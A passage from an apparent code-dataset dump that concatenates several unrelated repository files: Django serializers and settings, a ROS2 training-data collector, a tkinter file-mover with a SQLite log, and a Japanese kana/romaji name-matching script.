return AudioPipelineOutput(audios=audio)
| [
"[email protected]"
] | |
d6e06778da1716fbaaf68b4e91319ac1c219ef43 | daaf133cc4146ecd3b0df5ceafea84daa6bac2ce | /project/notes/serializers.py | 085cf9d4da8d8d79ed810d541f550edae69f4dcb | [] | no_license | core-api/heroku-app | 8c29452c609e4ff2344542e1e952a343f29953f6 | 7f03a36dc34baddcdf4cda8534ab800a98e079c9 | refs/heads/master | 2023-07-20T05:34:25.707890 | 2016-01-20T12:32:12 | 2016-01-20T12:32:12 | 32,865,301 | 1 | 0 | null | 2016-01-20T12:23:01 | 2015-03-25T13:11:06 | Python | UTF-8 | Python | false | false | 326 | py | from rest_framework import serializers
class AddNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100)
class EditNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100, required=False)
complete = serializers.BooleanField(required=False)
| [
"[email protected]"
] | |
86068bfd992218949b5ac84033b0fc92b8e8480d | c6f1420a16f4b9bcebbc8c4a2f47a57908544386 | /scripts/collect_training_data.py | d33a4e0e1721ff93abc94dc70305df928d5af0ca | [] | no_license | AndreasZachariae/petra_patient_monitoring | 0324b1cc56dace0a31cf210a11aee5961e9ad21d | 6b099eb4a68506767f97577565e3580689ef2dda | refs/heads/master | 2023-02-10T23:31:46.794627 | 2021-01-11T17:26:13 | 2021-01-11T17:26:13 | 323,618,194 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,406 | py | #!/usr/bin/env python3
import numpy as np
import pandas as pd
import rclpy
from rclpy.node import Node
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
from petra_interfaces.msg import PatientFeatures
############################################# Konstanten ################################################################
image_topic = 'image'
#data_path = "~/petra_ws/src/petra_patient_monitoring/data/features.csv"
data_path = "data/features.csv"
#image_path = '//home//andreas//petra_ws//src//petra_patient_monitoring//data//images'
image_path = '//data//images'
header = ["Image", "Video", "Frame", "Class", "Presence", "TorsoBoundingBoxRatio", "HeadGroundDistance", "BufferedHeadGroundDistance",
"HeadVelocity", "BufferedHeadVelocity", "TorsoHeight", "BufferedTorsoHeight", "Centroid", "BufferedCentroid"]
video_id = 11
#########################################################################################################################
bridge = CvBridge()
df = pd.read_csv(data_path)
data = []
for row in range(len(df)):
row_data = []
for col in range(1, len(header)+1):
row_data.append(df.iloc[row, col])
data.append(row_data)
class CollectTrainingData(Node):
def __init__(self):
super().__init__('CollectTrainingData')
self.patient_features_subscriber = self.create_subscription(PatientFeatures, 'PatientFeatures', self.patient_features_callback, 50)
self.image_subscriber = self.create_subscription(Image, image_topic, self.image_callback, 50)
self.frame_id = 0
def patient_features_callback(self, msg):
entry = []
time = (msg.image_header.stamp.sec * 1000000000) + msg.image_header.stamp.nanosec
entry.append(time) # Image
entry.append(video_id) # Video
self.frame_id += 1
entry.append(self.frame_id) # Frame
entry.append(0) # Class
entry.append(msg.presence)
entry.append(msg.torso_bounding_box_ratio)
entry.append(msg.head_ground_distance)
entry.append(msg.buffered_head_ground_distance)
entry.append(msg.head_y_velocity)
entry.append(msg.buffered_head_y_velocity)
entry.append(msg.torso_height)
entry.append(msg.buffered_torso_height)
entry.append(msg.centroid)
entry.append(msg.buffered_centroid)
data.append(entry)
# self.get_logger().info("Added new data entry")
def image_callback(self, msg):
try:
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
except CvBridgeError as e:
print(e)
else:
time = (msg.header.stamp.sec * 1000000000) + msg.header.stamp.nanosec
path = image_path + '//video' + str(video_id) + '//Image' + str(time) + '.jpeg'
cv2.imwrite(path, cv2_img)
print("image saved to " + path)
def save_data():
df_new = pd.DataFrame(data, columns=header)
df_new.to_csv(data_path)
def main(args=None):
rclpy.init(args=args)
node = CollectTrainingData()
try:
rclpy.spin(node)
except KeyboardInterrupt:
save_data()
print('node stopped cleanly')
except BaseException:
print('exception in node:', file=sys.stderr)
raise
finally:
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
67909727dea76eb4f1eeb39edfacc633490c1ac9 | 601971884962c3208f7a2feabc8d48e0635a0120 | /Web/Plant_project/Plant/settings.py | 4ce164002b26360c2286e05cba699178ac823338 | [] | no_license | graceFor/Hanium_Project | 91d94b9c9eeffb15b68f53a1b031fbe26e89057a | 13c40fcc8b84ff4d39a2deecd4b2fe9eb1b7e08a | refs/heads/master | 2022-11-30T06:10:28.762145 | 2020-08-12T08:15:31 | 2020-08-12T08:15:31 | 278,850,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,279 | py | """
Django settings for Plant project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i2=6d6)qak%(^*21z0ohsq*brj00i1mncb!v+=l#u)93qlol*('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'plantapp.apps.PlantappConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Plant.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates'), ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Plant.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'plantapp', 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
9dfec48e40772393fd8d7d112751345456b6b289 | 28cbd8542834e5d9dd04b36a3dd11cd8d0df0ea9 | /UIForFileMovementFunc.py | 3eedf83a58de740668e157b5e6ff3c9639a497d8 | [] | no_license | reismahnic/Python-Program-For-Moving-Files-With-UI-And-Last-Run-Display | 43becc58d8fc79cfbed76f7a17586756b11a3dff | a2b48cf0eaab1213d66b094cbf48225bb6b4b4ab | refs/heads/master | 2020-07-12T06:59:07.945791 | 2017-06-14T22:23:06 | 2017-06-14T22:23:06 | 94,277,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,660 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Python Ver: 3.6.1
#
# Author: Reis Mahnic
#
# Purpose: Moves recently edited files from one folder to another. Also displays last moved date and time.
#
#
# Tested OS: This code was written and tested to work with Windows 10.
import os
from tkinter import *
import tkinter as tk
from tkinter import messagebox
import sqlite3
import shutil
import datetime as dt
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import datetime
from datetime import datetime, timedelta
# Be sure to import our other modules
# so we can have access to them
import UIForFileMovement
#create database
def create_db(self):
conn = sqlite3.connect('db_transferLog.db')
displayLast(self)
cur = conn.cursor()
cur.execute("CREATE TABLE if not exists tbl_transferLog(ID INTEGER PRIMARY KEY AUTOINCREMENT,col_logTime TEXT);")
conn.commit()
conn.close()
count_records()
first_run(self)
def first_run(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
cur,count = count_records(cur)
if count < 1:
cur.execute("""INSERT INTO tbl_transferLog (col_logTime) VALUES (?)""", ('08/06/17 19-09',))
conn.commit()
conn.close()
def count_records():
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
count = ""
count = cur.execute("""SELECT COUNT(*) FROM tbl_transferLog""").fetchone()
if count == None:
conn.close()
return ("No previous data.")
return count[0]
# catch if the user's clicks on the windows upper-right 'X' to ensure they want to close
def ask_quit(self):
if messagebox.askokcancel("Exit program", "Okay to exit application?"):
# This closes app
self.master.destroy()
os._exit(0)
def selectSourceDirectory(self):
source = filedialog.askdirectory()
self.sourceReturn.set(source)
def selectDestinationDirectory(self):
destination = filedialog.askdirectory()
self.destinationReturn.set(destination)
def setFileSource(self):
#List the source folder and destination folder
source = self.sourceReturn.get()
destination = self.destinationReturn.get()
print(source)
print(destination)
#Define the current time and the time period we want to look back at
now = dt.datetime.now()
before = now - dt.timedelta(hours=24)
#Print the list of file names
files = os.listdir(source)
addToList(self)
displayLast(self)
for root,dirs,files in os.walk(source):
for file_name in files:
path = os.path.join(root,file_name)
st = os.stat(path)
mod_time = dt.datetime.fromtimestamp(st.st_mtime)
if mod_time > before:
#Move all files in Folder A to Folder B
shutil.move(os.path.join(root, file_name), destination)
def addToList(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
var_logTime = dt.datetime.now()
cur.execute("""INSERT INTO tbl_transferLog (col_logTime) VALUES (?)""", (str((var_logTime)),))
conn.commit()
print(var_logTime)
def displayLast(self):
conn = sqlite3.connect('db_transferLog.db')
cur = conn.cursor()
try:
cur.execute("""SELECT col_logTime FROM tbl_transferLog WHERE ID = (SELECT MAX(ID) FROM tbl_transferLog);""")
varLastTime = cur.fetchall()
for data in varLastTime:
self.lbl_lastUse.config(text = 'Last Run: ' + (str(varLastTime[0])))
print(str(varLastTime))
except:
self.lbl_lastUse.config(text = 'The database is empty.')
| [
"[email protected]"
] | |
d63c6983f2dcdf576ef3ebfafdf14196ef632044 | c64269774427d81b474b923839c0ed24a8ac38f1 | /zoomident.py | d46f2d4485be6163432d1a911b8fb0b80d66ca34 | [
"LicenseRef-scancode-public-domain"
] | permissive | euske/python3-toys | ba6be94c61e75473426909d0a23d65b9eb54bf2a | 9945f22167e580f6e3ba1dc4a1513d25f2e6bafa | refs/heads/master | 2023-04-01T04:55:20.477855 | 2023-03-27T02:54:28 | 2023-03-27T02:54:28 | 45,541,191 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 20,046 | py | #!/usr/bin/env python
##
## Usage:
## $ ./zoomident.py -i meibo.csv -i extra.txt -p10:10 report.csv
##
## report.csv:
## 祐介 新山,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 新山 (祐),,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 99B99999 新山祐介,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## シンヤマユウスケ,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## Yusuke Shinyama,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
##
## meibo.csv:
## CS2,Dept,99B99999,新山 祐介,シンヤマ ユウスケ,,,2001/1/1,,,[email protected]
##
## extra.txt:
## 99B99999 新山 祐介 しんやま
##
import sys
import csv
from datetime import datetime, time
## Mora
##
class Mora:
def __init__(self, mid, zenk, hank, zenh, *rules):
self.mid = mid
self.zenk = zenk
self.hank = hank
self.zenh = zenh
self.roff = []
self.reng = []
for rule in rules:
if rule.startswith('!'):
self.roff.append(rule[1:])
elif rule.startswith('+'):
self.reng.append(rule[1:])
else:
self.roff.append(rule)
self.reng.append(rule)
#assert self.roff, rules
#assert self.reng, rules
return
def __repr__(self):
return '<%s>' % self.mid
def __str__(self):
return self.zenk
## Mora Table
##
class MoraTable:
@classmethod
def get(klass, k):
return klass.KEY2MORA.get(k, k)
MORA_NN = Mora(
'.n', 'ン', '\uff9d', 'ん', "n'", '+n',
'n:k', 'n:s', 'n:t', 'n:c', 'n:h', 'n:m', 'n:r', 'n:w',
'n:g', 'n:z', 'n:d', 'n:j', 'n:b', 'n:f', 'n:p', 'm:p',
'n:q', 'n:v', 'n:x', 'n:l')
ALL = (
# (symbol, zenkaku_kana, hankaku_kana, zenkaku_hira, output, input)
MORA_NN,
Mora('.a', 'ア', '\uff71', 'あ', 'a'),
Mora('.i', 'イ', '\uff72', 'い', 'i', '+y'),
Mora('.u', 'ウ', '\uff73', 'う', 'u', 'wu', '+w'),
Mora('.e', 'エ', '\uff74', 'え', 'e'),
Mora('.o', 'オ', '\uff75', 'お', 'o'),
Mora('ka', 'カ', '\uff76', 'か', 'ka', '+ca'),
Mora('ki', 'キ', '\uff77', 'き', 'ki', '+ky'),
Mora('ku', 'ク', '\uff78', 'く', 'ku', '+k', '+c', '+q'),
Mora('ke', 'ケ', '\uff79', 'け', 'ke'),
Mora('ko', 'コ', '\uff7a', 'こ', 'ko'),
Mora('sa', 'サ', '\uff7b', 'さ', 'sa'),
Mora('si', 'シ', '\uff7c', 'し', '!si', 'shi', '+si', '+sy'),
Mora('su', 'ス', '\uff7d', 'す', 'su', '+s'),
Mora('se', 'セ', '\uff7e', 'せ', 'se'),
Mora('so', 'ソ', '\uff7f', 'そ', 'so'),
Mora('ta', 'タ', '\uff80', 'た', 'ta'),
Mora('ti', 'チ', '\uff81', 'ち', '!ti', 'chi', 'ci', '+ch'),
Mora('tu', 'ツ', '\uff82', 'つ', '!tu', 'tsu'),
Mora('te', 'テ', '\uff83', 'て', 'te'),
Mora('to', 'ト', '\uff84', 'と', 'to', '+t'),
Mora('na', 'ナ', '\uff85', 'な', 'na'),
Mora('ni', 'ニ', '\uff86', 'に', 'ni', '+ny'),
Mora('nu', 'ヌ', '\uff87', 'ぬ', 'nu'),
Mora('ne', 'ネ', '\uff88', 'ね', 'ne'),
Mora('no', 'ノ', '\uff89', 'の', 'no'),
Mora('ha', 'ハ', '\uff8a', 'は', 'ha'),
Mora('hi', 'ヒ', '\uff8b', 'ひ', 'hi', '+hy'),
Mora('hu', 'フ', '\uff8c', 'ふ', '!hu', 'fu', '+hu', '+f'),
Mora('he', 'ヘ', '\uff8d', 'へ', 'he'),
Mora('ho', 'ホ', '\uff8e', 'ほ', 'ho'),
Mora('ma', 'マ', '\uff8f', 'ま', 'ma'),
Mora('mi', 'ミ', '\uff90', 'み', 'mi', '+my'),
Mora('mu', 'ム', '\uff91', 'む', 'mu', '+m'),
Mora('me', 'メ', '\uff92', 'め', 'me'),
Mora('mo', 'モ', '\uff93', 'も', 'mo'),
Mora('ya', 'ヤ', '\uff94', 'や', 'ya'),
Mora('yu', 'ユ', '\uff95', 'ゆ', 'yu'),
Mora('ye', 'イェ', '\uff72\uff6a', 'いぇ', 'ye'),
Mora('yo', 'ヨ', '\uff96', 'よ', 'yo'),
Mora('ra', 'ラ', '\uff97', 'ら', 'ra', '+la'),
Mora('ri', 'リ', '\uff98', 'り', 'ri', '+li', '+ry', '+ly'),
Mora('ru', 'ル', '\uff99', 'る', 'ru', '+lu', '+r', '+l'),
Mora('re', 'レ', '\uff9a', 'れ', 're', '+le'),
Mora('ro', 'ロ', '\uff9b', 'ろ', 'ro', '+lo'),
Mora('wa', 'ワ', '\uff9c', 'わ', 'wa'),
Mora('wi', 'ウィ', '\uff73\uff68', 'うぃ', 'whi', '+wi', '+wy', '+why'),
Mora('we', 'ウェ', '\uff73\uff6a', 'うぇ', 'whe', '+we'),
Mora('wo', 'ウォ', '\uff73\uff6b', 'うぉ', 'who'),
Mora('Wi', 'ヰ', None, 'ゐ', '!wi'),
Mora('We', 'ヱ', None, 'ゑ', '!we'),
Mora('Wo', 'ヲ', '\uff66', 'を', 'wo'),
# Special moras: They don't have actual pronunciation,
# but we keep them for IMEs.
Mora('xW', 'ァ', '\uff67', 'ぁ', '!xa', '!la'),
Mora('xI', 'ィ', '\uff68', 'ぃ', '!xi', '!li'),
Mora('xV', 'ゥ', '\uff69', 'ぅ', '!xu', '!lu'),
Mora('xE', 'ェ', '\uff6a', 'ぇ', '!xe', '!le'),
Mora('xR', 'ォ', '\uff6b', 'ぉ', '!xo', '!lo'),
Mora('xA', 'ャ', '\uff6c', 'ゃ', '!xya', '!lya'),
Mora('xU', 'ュ', '\uff6d', 'ゅ', '!xyu', '!lyu'),
Mora('xO', 'ョ', '\uff6e', 'ょ', '!xyo', '!lyo'),
# chouon
Mora('x-', 'ー', '\uff70', 'ー', '!x-', '+h'),
# choked sound (Sokuon)
Mora('.t', 'ッ', '\uff6f', 'っ', '!xtu', '!ltu',
'k:k', 's:s', 't:t', 'h:h', 'f:f', 'm:m', 'r:r',
'g:g', 'z:z', 'j:j', 'd:d', 'b:b', 'v:v', 'b:c', 't:c'),
# voiced (Dakuon)
Mora('ga', 'ガ', '\uff76\uff9e', 'が', 'ga'),
Mora('gi', 'ギ', '\uff77\uff9e', 'ぎ', 'gi', '+gy'),
Mora('gu', 'グ', '\uff78\uff9e', 'ぐ', 'gu', '+g'),
Mora('ge', 'ゲ', '\uff79\uff9e', 'げ', 'ge'),
Mora('go', 'ゴ', '\uff7a\uff9e', 'ご', 'go'),
Mora('za', 'ザ', '\uff7b\uff9e', 'ざ', 'za'),
Mora('zi', 'ジ', '\uff7c\uff9e', 'じ', '!zi', 'ji', '+zi'),
Mora('zu', 'ズ', '\uff7d\uff9e', 'ず', 'zu', '+z'),
Mora('ze', 'ゼ', '\uff7e\uff9e', 'ぜ', 'ze'),
Mora('zo', 'ゾ', '\uff7f\uff9e', 'ぞ', 'zo'),
Mora('da', 'ダ', '\uff80\uff9e', 'だ', 'da'),
Mora('di', 'ヂ', '\uff81\uff9e', 'ぢ', '!di', 'dzi'),
Mora('du', 'ヅ', '\uff82\uff9e', 'づ', '!du', 'dzu'),
Mora('de', 'デ', '\uff83\uff9e', 'で', 'de'),
Mora('do', 'ド', '\uff84\uff9e', 'ど', 'do', '+d'),
Mora('ba', 'バ', '\uff8a\uff9e', 'ば', 'ba'),
Mora('bi', 'ビ', '\uff8b\uff9e', 'び', 'bi', '+by'),
Mora('bu', 'ブ', '\uff8c\uff9e', 'ぶ', 'bu', '+b'),
Mora('be', 'ベ', '\uff8d\uff9e', 'べ', 'be'),
Mora('bo', 'ボ', '\uff8e\uff9e', 'ぼ', 'bo'),
# p- sound (Handakuon)
Mora('pa', 'パ', '\uff8a\uff9f', 'ぱ', 'pa'),
Mora('pi', 'ピ', '\uff8b\uff9f', 'ぴ', 'pi', '+py'),
Mora('pu', 'プ', '\uff8c\uff9f', 'ぷ', 'pu', '+p'),
Mora('pe', 'ペ', '\uff8d\uff9f', 'ぺ', 'pe'),
Mora('po', 'ポ', '\uff8e\uff9f', 'ぽ', 'po'),
# double consonants (Youon)
Mora('KA', 'キャ', '\uff77\uff6c', 'きゃ', 'kya'),
Mora('KU', 'キュ', '\uff77\uff6d', 'きゅ', 'kyu', '+cu'),
Mora('KE', 'キェ', '\uff77\uff6a', 'きぇ', 'kye'),
Mora('KO', 'キョ', '\uff77\uff6e', 'きょ', 'kyo'),
Mora('kA', 'クァ', '\uff78\uff67', 'くぁ', 'qa'),
Mora('kI', 'クィ', '\uff78\uff68', 'くぃ', 'qi'),
Mora('kE', 'クェ', '\uff78\uff6a', 'くぇ', 'qe'),
Mora('kO', 'クォ', '\uff78\uff6b', 'くぉ', 'qo'),
Mora('SA', 'シャ', '\uff7c\uff6c', 'しゃ', '!sya', 'sha', '+sya'),
Mora('SU', 'シュ', '\uff7c\uff6d', 'しゅ', '!syu', 'shu', '+syu', '+sh'),
Mora('SE', 'シェ', '\uff7c\uff6a', 'しぇ', '!sye', 'she', '+sye'),
Mora('SO', 'ショ', '\uff7c\uff6e', 'しょ', '!syo', 'sho', '+syo'),
Mora('CA', 'チャ', '\uff81\uff6c', 'ちゃ', '!tya', '!cya', 'cha'),
Mora('CU', 'チュ', '\uff81\uff6d', 'ちゅ', '!tyu', '!cyu', 'chu'),
Mora('CE', 'チェ', '\uff81\uff6a', 'ちぇ', '!tye', '!cye', 'che'),
Mora('CO', 'チョ', '\uff81\uff6e', 'ちょ', '!tyo', '!cyo', 'cho'),
Mora('TI', 'ティ', '\uff83\uff68', 'てぃ', '!tyi', '+ti'),
Mora('TU', 'テュ', '\uff83\uff6d', 'てゅ', '!thu', '+tu'),
Mora('TO', 'トゥ', '\uff84\uff69', 'とぅ', '!tho', '+two'),
Mora('NA', 'ニャ', '\uff86\uff6c', 'にゃ', 'nya'),
Mora('NU', 'ニュ', '\uff86\uff6d', 'にゅ', 'nyu'),
Mora('NI', 'ニェ', '\uff86\uff6a', 'にぇ', 'nye'),
Mora('NO', 'ニョ', '\uff86\uff6e', 'にょ', 'nyo'),
Mora('HA', 'ヒャ', '\uff8b\uff6c', 'ひゃ', 'hya'),
Mora('HU', 'ヒュ', '\uff8b\uff6d', 'ひゅ', 'hyu'),
Mora('HE', 'ヒェ', '\uff8b\uff6a', 'ひぇ', 'hye'),
Mora('HO', 'ヒョ', '\uff8b\uff6e', 'ひょ', 'hyo'),
Mora('FA', 'ファ', '\uff8c\uff67', 'ふぁ', 'fa'),
Mora('FI', 'フィ', '\uff8c\uff68', 'ふぃ', 'fi', '+fy'),
Mora('FE', 'フェ', '\uff8c\uff6a', 'ふぇ', 'fe'),
Mora('FO', 'フォ', '\uff8c\uff6b', 'ふぉ', 'fo'),
Mora('FU', 'フュ', '\uff8c\uff6d', 'ふゅ', 'fyu'),
Mora('Fo', 'フョ', '\uff8c\uff6e', 'ふょ', 'fyo'),
Mora('MA', 'ミャ', '\uff90\uff6c', 'みゃ', 'mya'),
Mora('MU', 'ミュ', '\uff90\uff6d', 'みゅ', 'myu'),
Mora('ME', 'ミェ', '\uff90\uff6a', 'みぇ', 'mye'),
Mora('MO', 'ミョ', '\uff90\uff6e', 'みょ', 'myo'),
Mora('RA', 'リャ', '\uff98\uff6c', 'りゃ', 'rya', '+lya'),
Mora('RU', 'リュ', '\uff98\uff6d', 'りゅ', 'ryu', '+lyu'),
Mora('RE', 'リェ', '\uff98\uff6a', 'りぇ', 'rye', '+lye'),
Mora('RO', 'リョ', '\uff98\uff6e', 'りょ', 'ryo', '+lyo'),
# double consonants + voiced
Mora('GA', 'ギャ', '\uff77\uff9e\uff6c', 'ぎゃ', 'gya'),
Mora('GU', 'ギュ', '\uff77\uff9e\uff6d', 'ぎゅ', 'gyu'),
Mora('GE', 'ギェ', '\uff77\uff9e\uff6a', 'ぎぇ', 'gye'),
Mora('GO', 'ギョ', '\uff77\uff9e\uff6e', 'ぎょ', 'gyo'),
Mora('Ja', 'ジャ', '\uff7c\uff9e\uff6c', 'じゃ', 'ja', 'zya'),
Mora('Ju', 'ジュ', '\uff7c\uff9e\uff6d', 'じゅ', 'ju', 'zyu'),
Mora('Je', 'ジェ', '\uff7c\uff9e\uff6a', 'じぇ', 'je', 'zye'),
Mora('Jo', 'ジョ', '\uff7c\uff9e\uff6e', 'じょ', 'jo', 'zyo'),
Mora('JA', 'ヂャ', '\uff81\uff9e\uff6c', 'ぢゃ', 'zha'),
Mora('JU', 'ヂュ', '\uff81\uff9e\uff6d', 'ぢゅ', 'zhu'),
Mora('JE', 'ヂェ', '\uff81\uff9e\uff6a', 'ぢぇ', 'zhe'),
Mora('JO', 'ヂョ', '\uff81\uff9e\uff6e', 'ぢょ', 'zho'),
Mora('dI', 'ディ', '\uff83\uff9e\uff68', 'でぃ', '+di', 'dyi'),
Mora('dU', 'デュ', '\uff83\uff9e\uff6d', 'でゅ', '+du', 'dyu', 'dhu'),
Mora('dO', 'ドゥ', '\uff84\uff9e\uff69', 'どぅ', 'dho'),
Mora('BA', 'ビャ', '\uff8b\uff9e\uff6c', 'びゃ', 'bya'),
Mora('BU', 'ビュ', '\uff8b\uff9e\uff6d', 'びゅ', 'byu'),
Mora('BE', 'ビェ', '\uff8b\uff9e\uff6a', 'びぇ', 'bye'),
Mora('BO', 'ビョ', '\uff8b\uff9e\uff6e', 'びょ', 'byo'),
Mora('va', 'ヴァ', '\uff73\uff9e\uff67', 'う゛ぁ', 'va'),
Mora('vi', 'ヴィ', '\uff73\uff9e\uff68', 'う゛ぃ', 'vi', '+vy'),
Mora('vu', 'ヴ', '\uff73\uff9e', 'う゛', 'vu', '+v'),
Mora('ve', 'ヴェ', '\uff73\uff9e\uff6a', 'う゛ぇ', 've'),
Mora('vo', 'ヴォ', '\uff73\uff9e\uff6b', 'う゛ぉ', 'vo'),
# double consonants + p-sound
Mora('PA', 'ピャ', '\uff8b\uff9f\uff6c', 'ぴゃ', 'pya'),
Mora('PU', 'ピュ', '\uff8b\uff9f\uff6d', 'ぴゅ', 'pyu'),
Mora('PE', 'ピェ', '\uff8b\uff9f\uff6a', 'ぴぇ', 'pye'),
Mora('PO', 'ピョ', '\uff8b\uff9f\uff6e', 'ぴょ', 'pyo'),
)
KEY2MORA = { m.mid:m for m in ALL }
## Mora Parser
##
class MoraParser:
def __init__(self):
self._tree = {}
for m in MoraTable.ALL:
for k in (m.zenk, m.hank, m.zenh):
if k is None: continue
self.add(k, m, allowConflict=True)
return
def add(self, s, m, allowConflict=False):
#print('add:', s, m)
t0 = self._tree
(s0,_,s1) = s.partition(':')
for c in (s0+s1)[:-1]:
if c in t0:
(_,_,t1) = t0[c]
else:
t1 = {}
t0[c] = (None, None, t1)
t0 = t1
c = (s0+s1)[-1]
if c in t0:
(obj,_,t1) = t0[c]
if obj is not None and not allowConflict:
raise ValueError('already defined: %r' % s)
else:
t1 = {}
t0[c] = (m, s0, t1)
return
def parse(self, s, i0=0):
i1 = i0
t0 = self._tree
m = s0 = None
while i1 < len(s):
c = s[i1].lower()
if c in t0:
(m,s0,t1) = t0[c]
i1 += 1
t0 = t1
elif m is not None:
yield (s[i0:i1], m)
i0 = i1 = i0+len(s0)
t0 = self._tree
m = s0 = None
else:
yield (s[i1], None)
i0 = i1 = i1+1
t0 = self._tree
if m is not None:
yield (s[i0:], m)
return
class MoraParserOfficial(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('nn', MoraTable.MORA_NN)
return
class MoraParserOfficialAnna(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('n', MoraTable.MORA_NN)
return
class MoraParserEnglish(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.reng:
self.add(k, m)
return
## String Generator
##
class StringGenerator:
def generate(self, seq):
s = ''
m1 = None
for m2 in seq:
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, m2)
else:
s += m1
m1 = m2
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, None)
else:
s += m1
return s
def convert(self, m1, m2=None):
return m1.zenk
class GeneratorOfficial(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.ynN':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorOfficialAnna(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorEnglish(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.reng[0]
if not k.startswith('c'):
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if isinstance(m2, Mora) and m2.mid[0] in 'pP':
return 'm' # NN+"p" -> "mp"
elif not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.reng[0]
PARSE_ENGLISH = MoraParserEnglish()
GEN = StringGenerator()
GEN_ENGLISH = GeneratorEnglish()
# expand(s): Expand features
def expand(s):
words = []
w = ''
for c in s:
if c.isalpha():
w += c
elif w:
words.append(w)
w = ''
if w:
words.append(w)
a = []
for w in words:
a.append(w.lower())
w1 = w2 = ''
for (s,m) in PARSE_ENGLISH.parse(w):
if m is not None:
w1 += m.zenk
w2 += m.reng[0].lower()
if w1:
a.append(w1)
if w2:
a.append(w2)
for w1 in a:
yield w1
if "'" in w1:
yield w1.replace("'",'')
for w2 in a:
if w1 != w2:
w = w1+w2
yield w
if "'" in w:
yield w.replace("'",'')
return
class IndexDB:
def __init__(self):
self.index = {}
return
def add(self, name, uid):
# name -> {feats} -> uid
feats = set(expand(name))
for f in feats:
self.addraw(f, uid)
return
def addraw(self, feat, uid):
if feat in self.index:
a = self.index[feat]
else:
